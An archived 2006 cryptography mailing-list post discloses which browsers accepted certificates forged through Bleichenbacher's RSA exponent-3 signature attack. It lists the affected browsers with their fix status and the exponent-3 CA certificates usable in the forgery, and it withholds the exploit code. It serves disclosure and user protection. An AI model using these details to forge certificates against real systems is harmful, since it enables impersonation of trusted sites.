[43501] in cryptography@c2.net mail archive

home help back first fref pref prev next nref lref last post

Re: Real World Exploit for Bleichenbachers Attack on SSL from

daemon@ATHENA.MIT.EDU (Erik Tews)
Fri Sep 15 18:59:02 2006

X-Original-To: cryptography@metzdowd.com
X-Original-To: cryptography@metzdowd.com
From: Erik Tews <e_tews@cdc.informatik.tu-darmstadt.de>
To: Cryptography <cryptography@metzdowd.com>
In-Reply-To: <1158273608.4171.108.camel@localhost.localdomain>
Date: Fri, 15 Sep 2006 19:29:39 +0200


--=-zDbXQw95+lkOaNarCaCH
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Am Freitag, den 15.09.2006, 00:40 +0200 schrieb Erik Tews:
> I have to check some legal aspects before publishing the names of the
> browser which accepted this certificate and the name of the
> ca-certificates with exponent 3 I used in some hours, if nobody tells me
> not to do that. Depending on the advice I get, I will release the
> sourcecode of the exploit too.

OK, so here are the names of the browsers I tried:

      * Mozilla Firefox Version 1.5.0.6 and all previous versions
        including all old versions like netscape 4 seem to be affected.
        They don't display any kind of warning message at all, nor has
        the user the possibility to see something if he looks at the ssl
        connection properties. Firefox 1.5.0.7 was released yesterday
        and contains a fix. Netscape is not longer supported and
        netscape phoned me and suggested switching to another browser
        like seamonkey.
      * Opera 9.01 is affected. Opera is going to release 9.02 very very
        soon which will contain a bugfix. Opera users are automatically
        notified once a week when a new version is available.
      * Konqueror from the kde project uses openssl for ssl-connections.
        They are affected, but after having patched openssl, konqueror
        is fixed too.

The following certs could be used in the attack:

Starfieldtech has issued the following certificate:

Issuer: L=3DValiCert Validation Network, O=3DValiCert, Inc., OU=3DValiCert =
Cla ss 2 Policy Validation Authority, CN=3Dhttp://www.valicert.com//emailAd=
dress=3Dinfo@ valicert.com
Subject: C=3DUS, ST=3DArizona, L=3DScottsdale, O=3DStarfield Technologies, =
Inc.,  OU=3Dhttp://www.starfieldtech.com/repository, CN=3DStarfield Secure =
Certification A uthority/emailAddress=3Dpractices@starfieldtech.com
X509v3 Basic Constraints: CA:TRUE
Serial Number: 260 (0x104)
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)

This can be used to create an CA certificate which seems to be signed by St=
arfieldtech

There is another certificate by default in a lot of browsers:

Issuer: C=3DUS, O=3DEntrust.net, OU=3Dwww.entrust.net/CPS incorp. by ref. (=
limits liab.), OU=3D(c) 1999 Entrust.net Limited, CN=3DEntrust.net Secure S=
erver Certification Authority
Subject: C=3DUS, O=3DEntrust.net, OU=3Dwww.entrust.net/CPS incorp. by ref. =
(limits liab.), OU=3D(c) 1999 Entrust.net Limited, CN=3DEntrust.net Secure =
Server Certification Authority
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)
X509v3 Basic Constraints: CA:TRUE
Serial Number: 927650371 (0x374ad243)

This one can be used too.

Depending on the browser you use, there are some other certificates.
Here is a list of all Subject DN of all CA certs we have found so far,
which seems to be affected:

  * C=3DUS, O=3DDigital Signature Trust Co., OU=3DDSTCA E1
      * C=3DUS, O=3DDigital Signature Trust Co., OU=3DDSTCA E2
      * C=3DUS, O=3DEntrust.net, OU=3Dwww.entrust.net/Client_CA_Info/CPS
        incorp. by ref. limits liab., OU=3D(c) 1999 Entrust.net Limited,
        CN=3DEntrust.net Client Certification Authority
      * C=3DUS, O=3DEntrust.net, OU=3Dwww.entrust.net/CPS incorp. by ref.
        (limits liab.), OU=3D(c) 1999 Entrust.net Limited, CN=3DEntrust.net
        Secure Server Certification Authority
      * C=3DEU, O=3DAC Camerfirma SA CIF A82743287,
        OU=3Dhttp://www.chambersign.org, CN=3DChambers of Commerce Root
      * C=3DEU, O=3DAC Camerfirma SA CIF A82743287,
        OU=3Dhttp://www.chambersign.org, CN=3DGlobal Chambersign Root
      * C=3DUS, O=3DThe Go Daddy Group, Inc., OU=3DGo Daddy Class 2
        Certification Authority
      * C=3DUS, O=3DStarfield Technologies, Inc., OU=3DStarfield Class 2
        Certification Authority

I decided to keep the actual implementation of the exploit secret for the m=
oment.

We put up a little webpage summarizing some postings related to the
attack. This is written primary for end users who want to secure their
browsers, but contains links to some intresting mailing list posts too.

http://www.cdc.informatik.tu-darmstadt.de/securebrowser/

--=-zDbXQw95+lkOaNarCaCH
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Dies ist ein digital signierter Nachrichtenteil

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQBFCuMD1V7s4RB7CAcRAi0EAKCAnRftTA8a/8EyICybPGuDB8bdnwCfYtlw
2QBTcDQzE/laYyBa4e7EnVw=
=fyzi
-----END PGP SIGNATURE-----

--=-zDbXQw95+lkOaNarCaCH--


---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com

home help back first fref pref prev next nref lref last post